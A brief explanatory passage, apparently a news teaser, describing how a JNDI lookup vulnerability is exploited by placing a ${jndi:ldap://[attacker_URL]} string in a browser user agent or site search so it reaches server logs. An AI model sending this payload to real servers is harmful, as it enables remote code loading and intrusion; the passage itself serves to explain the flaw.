To exploit this vulnerability, a threat actor can change their web browser’s user agent and visit a site or search for a string on a website using the format ${jndi:ldap://[attacker_URL]}. Doing so will cause the string to be appended to the web server’s access logs.

read more